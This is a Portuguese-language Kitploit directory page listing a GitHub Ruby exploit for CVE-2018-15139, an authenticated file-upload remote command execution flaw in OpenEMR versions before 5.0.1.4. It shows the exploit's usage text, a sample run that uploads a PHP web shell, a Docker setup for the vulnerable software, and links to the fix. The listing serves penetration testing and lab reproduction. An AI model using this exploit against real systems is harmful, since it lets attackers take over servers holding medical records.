Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/sec-it/exploit-cve-2018-15139
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubsec-it/exploit-cve-2018-15139

exploit-CVE-2018-15139

OpenEMR < 5.0.1.4 - (Autenticado) Upload de arquivo - Execução remota de comandos

Ver Repositório
22há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do OpenEMR CVE-2018-15139

OpenEMR < 5.0.1.4 - Envio de arquivo (autenticado) - Execução remota de comandos

Exploit para CVE-2018-15139.

Uso

root@kitploit:~
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

Exemplo

root@kitploit:~
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

Requisitos

  • httpx
  • docopt.rb

Exemplo usando gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Implantação Docker do software vulnerável

Aviso: obviamente, esta configuração não é adequada para uso em produção!

root@kitploit:~
$ sudo docker-compose up

As permissões da pasta de upload estão quebradas na imagem docker oficial do OpenEMR, portanto é necessário conectar-se ao contêiner e corrigir as permissões, por exemplo:

root@kitploit:~
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

Referências

  • Software alvo: OpenEMR
    • Página inicial: https://www.open-emr.org/
    • Código-fonte: https://github.com/openemr/openemr
    • Docker: veja docker-compose.yml
    • Versão vulnerável: < 5.0.1.4 (ou seja, até 5.0.1.3)
    • Correção: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

Esta é uma reescrita melhor de EDB-49998.

A vulnerabilidade foi encontrada por Project Insecurity.

Análise do exploit original e da vulnerabilidade:

  • OpenEMR corrige vulnerabilidades graves descobertas pelo Project Insecurity
Baixar ferramenta